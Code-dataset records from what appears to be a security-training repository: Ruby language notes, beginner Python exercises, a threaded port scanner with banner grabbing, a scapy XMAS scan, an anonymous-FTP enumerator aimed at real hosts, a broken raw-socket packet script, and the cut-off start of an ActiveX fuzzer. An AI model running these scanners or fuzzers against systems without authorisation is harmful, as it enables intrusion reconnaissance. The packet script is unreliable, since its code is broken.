#{ship1[:landers].inspect}\"\n#\n# class CargoPod; end\n# cargo_pod = CargoPod.new\n# ship1 << cargo_pod\n# p ship1\n#\n# p [ship1,ship2,ship3].sort.map{|ship|ship.name}\n#\n# +ship1\n# puts \"speed: #{ship1.speed}\"\n# -ship1\n# puts \"speed: #{ship1.speed}\"\n#\n# !ship1\n#\n# # won't work in boolean context anymore\n# if !ship1\n# puts \"ship isn't there\"\n# end\n#\n# # easy to get carried away with operator overload at expense of clarity - use sparingly when\n# # makes code MOAR readable\n\n# METHOD CALLS AS MESSAGES\n\n# case input\n# when :up_arrow then ship.up\n# when :down_arrow then ship.down\n# end\n#\n# handlers = {up_arrow: :up\n# down_arrow: :down}\n#\n# ship.send(handlers[input])\n# # or send msgs instead\n# ship.__send__(handlers[input])\n\n# METHODS OUTSIDE CLASSES\n\n# double\n# main -> self.class -> obj\n\n# METHOD MISSING\n\n# ship.xxyy -> NoMethodError\n\n# comes from method_missing - can override to provide more information for our use case\n\n" }, { "alpha_fraction": 0.569343090057373, "alphanum_fraction": 0.6204379796981812, "avg_line_length": 11.454545021057129, "blob_id": "9b7e34a414aa0e7ef3a3af8793b591d9d2630a9d", "content_id": "655bd46e4d66d4a09ad0bdf9cf515cc7e99b0012", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 137, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/python/Module-1/function.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nimport sys\n\n\ndef print5times(line):\n\n for count in range(0, 5):\n print(line)\n\nprint5times(sys.argv[1])\n" }, { "alpha_fraction": 0.5368464589118958, "alphanum_fraction": 0.5380815267562866, "avg_line_length": 28.265060424804688, "blob_id": "1c885587a0cd1a2157fa90dd0e0b3984e20b1623", "content_id": "e8ec9ee05f5bfa17c701235bb5534bc50a63cf1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 2429, "license_type": "no_license", "max_line_length": 101, "num_lines": 83, "path": "/ruby/analyzer.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\nclass Text\n attr_accessor :input\n\n def help\n puts 'for user input'\n puts '-u \"user input\"'\n puts 'for file input'\n puts '-f \"/path/to/file\"'\n exit\n end\n\n def user_input\n case ARGV[0]\n when \"-h\"\n help()\n when \"-u\"\n @input = ARGV[1]\n when \"-f\"\n begin\n @input = File.open(\"#{ARGV[1]}\",\"r\"){|x|x.readlines}\n @input = @input.map {|s| \"#{s}\" }.join(' ')\n rescue Exception => e\n puts e.message\n exit\n end\n else\n puts \"input error see help -h\"\n exit\n end\n end\n\n def characters\n char_cnt = @input.length\n char_without_spaces = @input.delete(' ').length\n puts \"There are #{char_cnt} characters in your data\"\n puts \"There are #{char_without_spaces} characters without spaces in your data\"\n end\n\n def lines\n linecnt = @input.split(\"\\n\").length\n puts linecnt.inspect\n puts \"There are #{linecnt} lines in your data\"\n end\n\n def words\n word_cnt = []\n words = @input.split(' ').each{|word| word_cnt<<word.length}\n words = word_cnt.inject(:+)\n puts \"There are #{words} words in your data\"\n end\n\n def averages\n # create sentences based on punctuation\n @sentence_cnt = @input.split(/[?,!,.]/)\n @paragraph_cnt = @input.split(\"\\n\")\n\n avg_words_per_sentence = lambda {\n words = @sentence_cnt.map{|word| word.split(' ')}\n num = []\n words.each{|word|num<<word.length}\n num.inject(:+) / @sentence_cnt.length\n }\n\n avg_sentence_per_block = lambda {\n sentences = @paragraph_cnt.map{|sentence| sentence.split('.')}\n num = []\n sentences.each{|sentence|num<<sentence.length}\n num.inject(:+) / @paragraph_cnt.length\n }\n puts \"There are #{@sentence_cnt.length} sentences in your data\"\n puts \"There are #{@paragraph_cnt.length} paragraphs in your data\"\n puts \"There is an average of #{avg_words_per_sentence.call} words per sentence in your data\"\n puts \"There is an average of #{avg_sentence_per_block.call} sentences per paragraph in your data\"\n end\nend\n\ntext = Text.new\ntext.user_input\ntext.characters\ntext.lines\ntext.words\ntext.averages\n" }, { "alpha_fraction": 0.630075216293335, "alphanum_fraction": 0.655639111995697, "avg_line_length": 24.576923370361328, "blob_id": "7e3794cf11011710a4b19b8826d88f9299a6a6fb", "content_id": "cacacad86048ed23afcd4cb12e850aae77f755ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "no_license", "max_line_length": 92, "num_lines": 26, "path": "/python/mock/xmascan.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#! /usr/bin/python\n\nimport sys\nfrom scapy.all import *\n# help\n\nprint './script ip port'\n\ndstip = sys.argv[1]\nsrc = RandShort()\ndstport=sys.argv[2]\nprint \"args - \" , sys.argv\nres = sr1(IP(dst=dstip)/TCP(dport=int(dstport),flags=\"FPU\"),timeout=10)\n\n# res.show() - need to catch for NoneType\n# port open - no resp\nif (str(type(res))==\"<type 'NoneType'>\"):\n print \"Open\"\n# rst pkt port is closed\nelif(res.haslayer(TCP)):\n if(res.getlayer(TCP).flags == 0x14):\n print \"Closed\"\n# icmp filtered maybe open or closed\nelif(res.haslayer(ICMP)):\n if(int(res.getlayer(ICMP).type)==3 and int(res.getlayer(ICMP).code) in [1,2,3,9,10,13]):\n print \"Filtered\"\n" }, { "alpha_fraction": 0.570155143737793, "alphanum_fraction": 0.5770881772041321, "avg_line_length": 28.134614944458008, "blob_id": "51b11e6ce9221e7cd6647718a512c45ba032a6f0", "content_id": "438755e610973b15c8f10d1fe3180b7b8522fc90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3029, "license_type": "no_license", "max_line_length": 127, "num_lines": 104, "path": "/python/Module-2/portscanner.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n__author__ = 'ma11ock'\n__version__ = '0.5' # major re-write cred to atomicmaster\n\nimport os, sys, argparse, socket, threading\n\nDEBUG = False\nif DEBUG:\n import pprint\n pp = pprint.PrettyPrinter(depth=6, indent=4)\n\n# we need this to make sure that multiple threads dont print to screen at the same time\nlock = threading.Semaphore(value=1)\n\n\n''' Define some functions '''\ndef check_port(host, port):\n if DEBUG:\n print 'trying ' + host + ':'+str(port)\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(1)\n sock.connect((host, int(port)))\n # just for kicks, lets see if there is a banner we can grab\n sock.send(\"Knock Knock\\r\\n\")\n banner = sock.recv(1024)\n lock.acquire() # This way we are the only people printing to the console\n print '[+] %d/tcp open'% port\n if len(banner) > 0:\n print '[+] ' + str(banner)\n except:\n lock.acquire()\n #print '[-] %d/tcp closed'% port\n finally:\n lock.release()\n sock.close()\n return\n\ndef scan(host, ports):\n lock.acquire()\n print \"-\" * 60\n print \"Scanning: \", host\n print \"-\" * 60\n lock.release()\n\n threads = list()\n for port in ports:\n thread = threading.Thread(target=check_port, args=(host, port))\n thread.start() #yeah thats really all you need\n threads.append(thread)\n # for thread in threads:\n # thread.join()\n\n''' Main '''\ndef main():\n ''' Parse Arguments '''\n # old way was a bit dirty, this is legit though\n parser = argparse.ArgumentParser()\n # add options\n parser.add_argument('-n', action='store', dest='host', help='Name or IP of the node you want to scan.')\n parser.add_argument('-p', action='append', dest='ports', default=[], help='Port or port range. You can add multiple -p(s)')\n # parse\n args = parser.parse_args()\n\n if DEBUG:\n print 'Args: '\n pp.pprint(args)\n\n ''' Make sure we have what we need, and can reach the target '''\n # we cant run if we dont have ports\n if len(args.ports) == 0:\n print parser.print_help()\n sys.exit(\"No ports or port ranges provided\")\n # we can ask for a host to scan\n if len(args.host) == 0:\n host = input(\"Enter hostname or IP to scan: \")\n else:\n host = args.host\n # get ip if we have name, get name if we have ip\n try:\n host_ip = socket.gethostbyname(host)\n except:\n sys.exit('Host name or IP could not be found')\n\n ports=list()\n for port in args.ports:\n if port.isdigit():\n ports.append(int(port))\n else:\n try:\n port_range = port.split('-')\n port_range = range(int(port_range[0]), int(port_range[1]))\n ports += port_range\n except:\n print 'Invalid port range %(port)s'\n if DEBUG:\n print 'Ports: '\n pp.pprint(ports)\n\n scan(host, ports)\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.5221739411354065, "alphanum_fraction": 0.5291304588317871, "avg_line_length": 28.84415626525879, "blob_id": "4c067962340e6b21a3b8015b61ccc6c6eecbb96d", "content_id": "d3c02f5efd6c40b5aae1ca3352db053ab5c8d8a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2300, "license_type": "no_license", "max_line_length": 102, "num_lines": 77, "path": "/python/Module-2/ftp_enum.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# py2\n# NOTE === not the most useful script - better to have this functionality built into something else\n# PURPOSE === build list of 10 ftp sites start 5 threads that rtrv 2 from the queue, log in, list dir\n# -- fulfills SPSE threading/locking/ftp exercises\n\n__author__ = 'ma11ock'\n\nimport threading, Queue, time, sys\nfrom ftplib import FTP\n\nftp_sites = [\n \"ftp.leadtek.com.tw\",\"ftp.gbnet.net\",\"ftp.muze.nl\",\n \"ftp.radius.cistron.nl\",\"ftp.sci.kun.nl\",\"ftp.stack.nl\",\n \"ftp.th.vu.nl\",\"ftp.tue.nl\",\"ftp.vu.nl\",\n \"ftp.corel.ca\"\n ]\n\nlock = threading.Semaphore(value=1)\n\n\nclass WorkerThread(threading.Thread):\n def __init__(self,queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def ftp(self):\n site = self.queue.get()\n site2 = self.queue.get()\n lock.acquire()\n try:\n print \"------------------------\"\n print \"CONNECTING to: %s\" % site\n print \"CONNECTING to: %s\" % site2\n ftp = FTP(site) # connect to host, default port\n ftp2 = FTP(site)\n print \"LOGGING in to: %s\" % site\n print \"LOGGING in to: %s\" % site2\n ftp.login() # user anonymous, passwd anonymous@\n ftp2.login()\n print \"----- dir contents -----\\n\"\n ftp.dir() # list directory contents\n print \"----- dir contents -----\\n\"\n ftp2.dir()\n print \"\\nEXITING: %s \" % site\n print \"EXITING: %s \" % site2\n except:\n sys.exit(\"permission denied\")\n finally:\n lock.release()\n self.queue.task_done()\n self.queue.task_done()\n\n\n def run(self):\n # put wtv code we want to run here\n print \"In WorkerThread\"\n while True:\n WorkerThread.ftp(self)\n\nqueue = Queue.Queue()\nfor j in ftp_sites:\n queue.put(j)\n\nfor i in range(5):\n lock.acquire()\n print \"Creating WorkerThread: %d\" % i\n worker = WorkerThread(queue)\n worker.setDaemon(True)\n worker.start()\n print \"WorkerThread %d Created!\" % i\n lock.release()\n\nqueue.join()\n\nprint\nprint \"All tasks complete\"\n\n\n" }, { "alpha_fraction": 0.6755092144012451, "alphanum_fraction": 0.6807200312614441, "avg_line_length": 42.081634521484375, "blob_id": "41d0dc223621b91ba3dde946201b3574b09deb72", "content_id": "aa9dc2e87cf9ec5352c2f9d7af16de8243fe6c4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2111, "license_type": "no_license", "max_line_length": 388, "num_lines": 49, "path": "/python/Module-2/queue.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# py2.7\n__author__ = 'ma11ock'\n\nimport threading, Queue, time\n\nclass WorkerThread(threading.Thread):\n def __init__(self,queue):\n threading.Thread.__init__(self)\n self.queue = queue\n\n def run(self):\n # put wtv code we want to run here\n print \"In WorkerThread\"\n while True:\n # rmv & rtrn item from queue,if optional args block = true & timeout = None (default), block if necessary until item is available,if timeout = pos num, it blocks at most timeout secs & raises Empty exception if no item was available within that time. Otherwise block = false, rtrn an item if one is immed available, else raise-Empty exception (timeout is ignored in that case)\n counter = self.queue.get()\n print \"counter: %d\" % counter\n print \"Ordered to sleep for %d seconds!\" % counter\n time.sleep(counter)\n print \"Finished sleeping for %d seconds\" % counter\n # for each get() used to fetch task,subsequent call to task_done() tells queue that processing on task is complete\n self.queue.task_done()\n\n# FIFO queue,maxsize-int that sets upper limit on # of items that can be placed queue\n# Insertion will block when size has been reached, until queue items are consumed\n# If maxsize <= 0, queue size is infinite\nqueue = Queue.Queue()\n\n# creating our threads\nfor i in range(10):\n print \"Creating WorkerThread: %d\" % i\n worker = WorkerThread(queue)\n # bool set b4 start() initial val inherited from the creating thread but main thread is not daemon so all threads in main thread default to daemon = False\n worker.setDaemon(True)\n worker.start()\n print \"WorkerThread %d Created!\" % i\n\n# building our queue\nfor j in range(10):\n queue.put(j)\n\n# blocks until all items in queue r rtrvd & processed\n# count of unfinished tasks goes up when item is added to queue\n# count dec when consumer thread calls task_done() -indicate item was rtrvd & all work is complete\n# join() unblocks if count of unifished tasks = 0\nqueue.join()\n\nprint \"All tasks complete\"\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5243445634841919, "avg_line_length": 15.121212005615234, "blob_id": "3d212965dfeb499115d03f4bda92197e6977be15", "content_id": "94969be43388619171ee34ec769ea8f6b4feeca3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 42, "num_lines": 33, "path": "/python/Module-1/loops.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# name = input(\"What is your name?\")\n#\n# print(\"Your name is \" + name)\n#\n# if name == \"ja\":\n# print(\"you are \" + name)\n# print(\"buster\")\n# elif name == \"jarrod\":\n#\n# else:\n# print(\"Unknown\")\n\ncond = True\n\nwhile cond:\n age = int(input(\"what is your age? \"))\n if age > 10:\n print(\"Your age is > 10\")\n else:\n print(\"your age is <= 10\")\n cond = False\nelse:\n print(\"i die\")\n\nitems = [1, 3, 4]\n\nfor num in items:\n print(num)\n\nfor item in range(1, 10, 2):\n print(item)\n\n\n" }, { "alpha_fraction": 0.6346049308776855, "alphanum_fraction": 0.6419618725776672, "avg_line_length": 21.114458084106445, "blob_id": "cb3f0a3cd2a9ed117cc7e271d7d0c2b288355dde", "content_id": "b8366bf70baeba9766f6f8d1682ba173b26fc82e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 3670, "license_type": "no_license", "max_line_length": 105, "num_lines": 166, "path": "/ruby/psFund/flowControl.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "num = 5\nline = if num > 3 then \"blah\" else \"poo\" end\n\n# only false and nil eval to false\n\n# if not is same as unless\n\n# ternary - condition ? do_this : else_do_this\n# can work well for short statement but nothing complex\n\n# += -= ||= or equal\n\n# ship ||= Spaceship.new - less verbose\n# ship = Spaceship.new unless ship - create new ship unless if exists or true\n\n# this doesn't work -undef var\n# a || a = 10\n# # if var doesn't exist it is assigned nil see below - doesn't work with bool\n# a ||= 10\n# b = 20 if false\n#\n# flag ||= true\n# flag = false\n# flag ||= true\n\n# FLOW CONTROL\n\n# || or vs && and\n# and / or have much lower precedence than && / ||\n# && higher precedence than ||\n# and / or have the same precedence\n\n# - use && || in conditional statements\n# - use and or for flow control\n\n# if engine.cut_out?\n# engine.restart or enable_emergency_power\n# end\n#\n# if engine.cut_out?\n# enable_emergency_power unless engine.restart\n# end\n\n# begin, until, while\n# begin end - execute at least once , like do - while\n# begin\n# lightning.start_flashing\n# sound.play\n# end while on_alert?\n#\n# begin\n# ship.accelerate\n# dosome.more_stuff\n# end until ship.at_veloc?\n\n# 1.upto(100) do |num|\n# puts \"num = \" + num.to_s\n# if num % 15 == 0\n# puts \"fizzbuzz\"\n# elsif num % 3 == 0\n# puts \"fizz\"\n# elsif num % 5 == 0\n# puts \"buzz\"\n# end\n# end\n\n# while msg = coms.get_msg\n# next if msg.type == \"sync\"\n# msg.process\n# end\n\n# while msg = coms.get_msg\n# msg.process\n# break if msg.type == \"voice\"\n# end\n#\n# i = 0\n# while i < 3\n# print \"enter pos num: \" # <- redo starts back on this line w/o re-eval while\n# input = gets.to_i\n# redo if input <= 0\n# i += 1\n# end\n\n# EXCEPTIONS\n# here rescues after batten_hatches, but light_sign could also throw errors so\n# def launch\n# begin\n# batten_hatches\n# rescue\n# puts \"couldn't batten\"\n# false\n# end\n# light_sign\n# end\n# # do like this - launch will return false if error incurred for either method + prob is generic msg\n# def launch\n# batten_hatches\n# light_sign\n# true\n# rescue\n# puts \"Exception intercepted\"\n# false\n# end\n# if LightError came from StandardError and we define StdError first Light Error would never be triggered\n# StdError would catch all exceptions including LightError\n# def launch\n# batten_hatches\n# light_sign\n# true\n# rescue LightError\n# puts \"Lights not working still launch\"\n# true\n# rescue StandardError => e\n# puts e.message\n# false\n# end\n#\n# # bad idea - bc will catch SignalException and SyntaxError\n# begin\n# ship = Spaceship.new\n# ship.launch\n# rescue Exception => e\n# puts e.message\n# puts e.backtrace\n# end\n\n# RAISE EXCEPTION\n\n# don't put rtrn statement in ensure as any errors thrown in method will get swallowed by rtrn in ensure\n# rtrn will execute instead\n\n# def batten_hatches\n# hatch_file = File.open(\"hatches.txt\")\n# # ..\n# raise HatchError, \"Door Jammed\" if door.jammed?\n# # ..\n# true\n# rescue SystemCallError => e\n# # handle system call errors\n# false\n# else # after rescue but b4 ensure\n# puts \"Well done no exceptions\"\n# ensure # always executed\n# hatch_file.close if hatch_file\n# end\n\n# RETRY\n# xfer to beginning of begin end block or beg of method\n\n# def batten_hatches\n# hatch_list = API.request(\"/hatches\") # <--\n# # ...\n# rescue RuntimeError => e\n# attempts ||= 0\n# attempts += 1\n# if attempts < 3\n# puts e.message + \". Retrying request.\"\n# retry # <--\n# else\n# puts \"Request failed\"\n# raise\n# end\n# end\n\n# throw catch - if need exception like non linear flow control but aren't handling errors" }, { "alpha_fraction": 0.5773195624351501, "alphanum_fraction": 0.6391752362251282, "avg_line_length": 13, "blob_id": "7ab03b9c7106a8852288f76cd797d8bc42505ece", "content_id": "1ee3d8e81060411dd3790d37f4ace97bfc11dbcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/python/Module-1/pack.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nimport pkgdemo\n\nans = pkgdemo.Calculator(10, 20)\n\nprint('%d' % ans.add())" }, { "alpha_fraction": 0.6571988463401794, "alphanum_fraction": 0.6622918844223022, "avg_line_length": 18.12359619140625, "blob_id": "64123945a71cdb71a1e4901a6c98baf88358e433", "content_id": "4f721dec762a7b7d04e1c760085e1b9999273b0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 5105, "license_type": "no_license", "max_line_length": 92, "num_lines": 267, "path": "/ruby/psFund/classesObjects.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# copy of obj\n# obj = \"my name\"\n# copy = obj\n#\n# obj.upcase!\n# puts obj\n# puts copy\n#\n# p obj.object_id\n# p copy.object_id\n#\n# # clone of obj -> new obj\n# new_obj = obj.clone\n# new_obj.downcase!\n#\n# p new_obj\n# p obj\n#\n# p new_obj.object_id\n# p obj.object_id\n\n# ATTRIBUTE ACCESSOR - INSTANCE VAR\n\n# class Spaceship\n # same as getter and setter dest methods below\n # attr_accessor :destination, :name\n # def launch(destination)\n # @destination = destination # inst var private only accessed inside methods\n # # go toward destination\n # end\n #\n # def destination\n # @destination\n # end\n #\n # def destination=(new_destination)\n # @destination = new_destination\n # end\n#\n# def cancel_launch\n# destination = \"\" # creates local var\n# self.destination = \"\"\n# end\n# end\n#\n# ship = Spaceship.new\n# ship.launch(\"Earth\")\n# p ship\n# p ship.destination = \"Earth\"\n#\n# INITIALIZE\n#\n# class Spaceship\n# def initialize(name,cargo_module_count)\n# @name = name\n# @cargo_hold = cargo_module_count\n# @power_level = 100\n# end\n# end\n#\n# ship = Spaceship.new(\"Dreadnaught\",4)\n# p ship\n#\n# class Probe\n# def deploy(deploy_time,return_time)\n# puts \"deploying\"\n# end\n# def take_sample\n# end\n# end\n#\n# # we want to take 2 different kinds of samples during our probe\n# class MineralProbe < Probe\n# def deploy(deploy_time)\n# puts \"preparing chamber\"\n# super(deploy_time, Time.now + 2 * 60 * 60)\n# end\n# def take_sample\n# end\n# end\n# class AtmosphericProbe < Probe\n# def take_sample\n# end\n# end\n#\n# MineralProbe.new.deploy(Time.now)\n\n# INHERITANCE - for re-using functionality not enforcing interfaces\n\n# class Probe\n# def dock\n# # probe specific\n# # docking actions\n# end\n# end\n#\n# class Lander\n# def dock\n# # lander specific\n# # docking actions\n# end\n# end\n#\n# class Spaceship\n# def capture(unit)\n# unit.dock # works on anything with dock method\n# transport_to_storage(unit)\n# end\n# end\n#\n# ship = Spaceship.new\n# ship.capture(probe)\n# ship.capture(lander)\n\n# CLASS METHODS\n# class method makes it clearer that this functionality is not reliant on obj state\n# class Spaceship\n# def self.thruster_count\n# 2\n# end\n# end\n\n# Spaceship.thruster_count\n# ship = Spaceship.new # this work\n# ship.thruster_count # this !work\n\n# CLASS VARIABLES\n# 1 copy of class var & shared between all obj & subclasses of that class\n# probably best to avoid class var\n# class Spaceship\n# @@thruster_count = 2\n# def self.thruster_count\n# @@thruster_count\n# end\n# end\n#\n# class SpritelySpaceship < Spaceship\n# @@thruster_count = 4\n# end\n#\n# class EconolineSpaceship < Spaceship\n# @@thruster_count = 1\n# end\n#\n# puts SpritelySpaceship.thruster_count\n#\n# # CLASS INSTANCE VARIABLE\n# class Spaceship\n# @thruster_count = 2\n# def self.thruster_count\n# @thruster_count\n# end\n# end\n#\n# class SpritelySpaceship < Spaceship\n# @thruster_count = 4\n# end\n#\n# class EconolineSpaceship < Spaceship\n# @thruster_count = 1\n# end\n# puts \"----\"\n# puts SpritelySpaceship.thruster_count\n# puts EconolineSpaceship.thruster_count\n# puts Spaceship.thruster_count\n\n# METHOD VISIBILITY\n\n# class Spaceship\n# def launch\n# batten_hatches\n# end\n# # every method below private until changed\n# private # or the more used way\n#\n# def batten_hatches\n# puts \"what is batten?\"\n# end\n# private :batten_hatches # like this\n# end\n#\n# ship = Spaceship.new\n# ship.batten_hatches # can't do private\n# ship.send :batten_hatches\n\n# public - default\n# private - can't be called with an explicit rcvr - allows subclasses to use private methods\n# private_class_method - is used to make class methods private\n# protected - allow access for other obj of the same class\n# private & protected not used a lot\n\n# def greet(greeting)\n# puts greeting + \", captain!\"\n# end\n#\n# res = class Spaceship\n# answer = 7*6\n# puts \"Calculating in class context: \" + answer.to_s\n# greet(\"Good morning\")\n# answer\n# end\n#\n# puts \"The class calculated: \" + res.to_s\n# puts Spaceship.superclass\n\n# self refers current execution\n# inside class - refers to class self. class method instead of instance\n\n# perfectly valid code re-opens Spaceship class to call launch method\n\n# class Spaceship\n# def hatch\n# end\n# end\n#\n# ship = Spaceship.new\n#\n# class Spaceship\n# def launch\n# end\n# end\n#\n# ship.launch\n#\n# class Spaceship\n# def launch\n# puts \"LAUNCH\"\n# end\n# end\n#\n# ship.launch\n\n# MONKEYPATCHING - dangerous can make code brittle with new updates etc\n\nclass String\n def space\n chars.join(\" \")\n end\n\n def size\n \"Useless string\"\n end\nend\n\nputs \"canyouhearme\".space\nputs \"yesican\".size\n\n# EQUALITY\n\nclass Spaceship\n attr_reader :name\n\n def initialize(name)\n @name = name\n end\n\n def ==(other)\n name == other.name\n end\nend\n\nship1 = Spaceship.new(\"testme\")\nship2 = Spaceship.new(\"testme\")\n\n# equal should not be overwritten, this is pointer comparison...equal is identity comparison\nputs ship1.equal?(ship2)\nputs ship1 == ship2" }, { "alpha_fraction": 0.6307161450386047, "alphanum_fraction": 0.6729939579963684, "avg_line_length": 22.632652282714844, "blob_id": "ffe67ac3ecd7bbd1d6d692be8879308f5103a356", "content_id": "58cf10c008c17353190ff03bab39819c324cec12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1159, "license_type": "no_license", "max_line_length": 99, "num_lines": 49, "path": "/python/Module-3/simplesniffer.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport socket, struct, binascii\n\n\ndef ip2long(ip):\n \"\"\"\n Convert an IP string to long\n \"\"\"\n packedIP = socket.inet_aton(ip)\n return struct.unpack(\"!L\", packedIP)[0]\n\n# htons /include/linux/if_ether.h -> defined ether protocol IDs\n# need to be root for rawSockets\n# PF_INET not available\nip = socket.gethostbyname(\"ma11ock\")\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_RAW)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\nsock.bind((ip,10001))\n\n# eth hdr only -> py 3 b tells python bytes object - i hate you python!\npkt = struct.pack(\"!6s6s2s\", b'\\xaa\\xaa\\xaa\\xaa\\xaa\\xaa', b'\\xbb\\xbb\\xbb\\xbb\\xbb\\xbb', b'\\x00\\x00')\n\npkt = pkt + b'hello there'\nprint(\"pkt : \" + pkt)\n\nsock.send(pkt, ip2long(ip))\n\netherHdr = pkt[0][0:14]\n\nhdr = etherHdr.unpack(\"!6s6s2s\", etherHdr)\n\nbinascii.hexlify(hdr[0])\nbinascii.hexlify(hdr[1])\nbinascii.hexlify(hdr[2])\n\nipHdr = pkt[0][14:34]\n\nip_hdr = struct.unpack(\"!12s4s4s\",ipHdr)\n\nprint(\"Src IP = \") + socket.inet_ntoa(ip_hdr[1])\nprint(\"Dest IP = \") + socket.inet_ntoa(ip_hdr[2])\n\ntcpHdr = pkt[0][34:54]\n\ntcp_hdr = struct.unpack(\"!HH16s\", tcpHdr)\nsock.close()\n\n" }, { "alpha_fraction": 0.4847457706928253, "alphanum_fraction": 0.5294915437698364, "avg_line_length": 19.5, "blob_id": "f5ff03db28960ace8b881f25cf362f425c711000", "content_id": "12dd7d57839048e2bce753d4e4528ecb38fc17a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1475, "license_type": "no_license", "max_line_length": 116, "num_lines": 72, "path": "/ruby/psFund/standardTypes.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# encoding: US-ASCII\n# overwrites encoding\n#\n# p 0x0F\n#\n# puts \"str\".encoding\n#\n# p %q['writes',some stuff is a str]\n#\n# p \"abc\" \"def\" # concat\n\n# SYMBOLS\n# arr = %i(up down left right)\n# p arr\n# # more efficient memory & performance wise\n# \"abc\".to_sym\n#\n# # ARRAYS\n# arr = [] # way to initialize\n# arr = Array.new(3) # for specified # of elem\n# arr = %i(up down left right)\n#\n# p arr[0..2]\n\n# ENUMERABLES\n# var = [1,2,3].map{|v| v * 10}\n# p var\n# var = [1,2,3].reduce(0) {|sum,v| sum + v}\n# p var\n# p [3,1,3].sort\n# p [1,3,4,5,2,3].select {|n| n.even?}\n# p [1,2,3,4,5].each_cons(2) {|v| p v}\n\n# HASH\n# h = {a: \"a\", b: \"b\"}\n# h[:a]\n#\n# h.each{|v|p v}\n# h.each{|k,v|p \"#{k} #{v}\"}\n\n# RANGES\n# .. upper bound included\n# ... upper not part of max\n# (1..10).class\n# (1..10).begin\n# (1..10).end\n# (1..10).include?(20)\n# (1..10).map {|v| v*2}\n# (\"aa\"..\"bb\").each{|v|p v}\n\n# PARALLEL ASSIGNMENT & SPLAT\n# a,b = 1,2\n# p a , b\n# c = 1,2,3,4\n# p c\n#\n# def get_values\n# [1,2,3,4]\n# end\n#\n# a,b = get_values\n# p a,b # grabs first 2 elem in get_values 2nd 2 are discarded\n# first, _,_, last = get_values # will ignore _ elem and grab first and last\n# p first, last\n#\n# a,*b = get_values # a grabs 1 b will grab remainder of elems in array - SPLAT\n# a,*b,c = get_values # if SPLAT is not last it is greedy & leaves only enough elem for remaining vars\n#\n# r = (1..10)\n# p [1,2,*r]\n# h = {a: \"a\",b: \"b\",c: \"c\"}\n# p [*h]" }, { "alpha_fraction": 0.5686274766921997, "alphanum_fraction": 0.5783826112747192, "avg_line_length": 29.602985382080078, "blob_id": "2f3b3a6d7492b4d335f0ec43e6035ff596ae5954", "content_id": "3867a7b111455830a57b59ee8e9b178e8495592e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 10251, "license_type": "no_license", "max_line_length": 89, "num_lines": 335, "path": "/FaX/html/fuzzer.js", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "// Modified from HD Moore's AxMan Fuzzer\n\n// built in Alerts as delay for our POST requests to our tcp log server\n// too fast and they do not arrive for each specific argument\n// Attempt to read the value of each document property\n\n// determine browser version\nif (window.XMLHttpRequest) {\n var xhr = new XMLHttpRequest();\n} else {\n var xhr = new ActiveXObject(\"Microsoft.XMLHTTP\");\n}\n// don't actually call the log method yet anyway..only inline seems to work at the moment\n/* function log(method,msg){\n\txhr.open(\"POST\", \"http://localhost:9000/\" , true);\n\txhr.send(\"FuzzMethod: \" + method + \" MSG: \" + msg);\n} */\n\n// delay gets script timeout\nfunction delay(time) {\n\tvar d1 = new Date();\n\tvar d2 = new Date();\n\twhile (d2.valueOf() < d1.valueOf() + time) {\n\t\td2 = new Date();\n }\n}\n\nfunction fuzzReadProperties(obj) {\n\tvar fs = ax[clsid]['Functions'];\n\tif (! fs)\n\t\treturn;\n\tfor (var i = 0; i < ax[clsid]['FunctionCount']; i++) {\n\t\tvar f = fs[i];\n\t\t// Skip all methods but the properties\n\t\tif (! (f && f['Name'] && f['Type'] == 'PropGet'))\n\t\t\tcontinue;\n\n\t\twindow.status = clsid + \" PropGet \" + f['Name'];\n\t\tmethod = \"fuzzReadProperties\";\n\n\t\ttry {\n\t\t\tvar tmp = 